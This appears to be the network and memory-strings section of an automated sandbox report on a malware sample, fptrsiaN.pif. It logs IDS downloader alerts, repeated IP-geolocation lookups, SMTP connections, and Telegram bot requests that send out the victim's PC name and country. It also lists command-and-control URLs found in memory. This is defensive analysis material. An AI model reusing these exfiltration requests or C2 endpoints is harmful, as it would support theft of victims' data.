Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49779 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49786 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 104.21.32.1:443

Source: global traffic

TCP traffic: 192.168.2.4:49773 -> 46.151.208.21:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49750 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49764 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2002:40:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2002:58:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2004:09:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.irco.com.sa

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 19:06:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 19:06:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 19:06:58 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D40F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EEC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: fptrsiaN.pif, 00000006.00000002.2987999528.000000001B358000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B316000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B2D5000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D41F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D42B000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011468270.000000001F922000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020036000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F08000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EFE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3013384079.0000000024DE0000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.2430924168.0000000024E63000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312A5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.0000000031298000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3013802889.0000000033EC7000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2997234899.000000002F111000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://e6.i.lencr.org/0
